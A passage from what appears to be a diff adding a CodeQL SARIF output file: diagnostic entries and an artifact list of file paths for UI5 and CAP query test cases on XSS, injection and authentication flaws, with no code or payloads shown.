"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + } ], + "executionSuccessful" : true + } ], + "artifacts" : [ { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + }, { + "location" : { + "uri" : 
".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + }, { + "location" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + }, { + "location" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + }, { + "location" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + }, { + "location" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + }, { + "location" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 
+ } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + 
"uriBaseId" : "%SRCROOT%", + "index" : 48 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 67 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 77 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 
87 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + }, { + "location" : { + "uri" : 
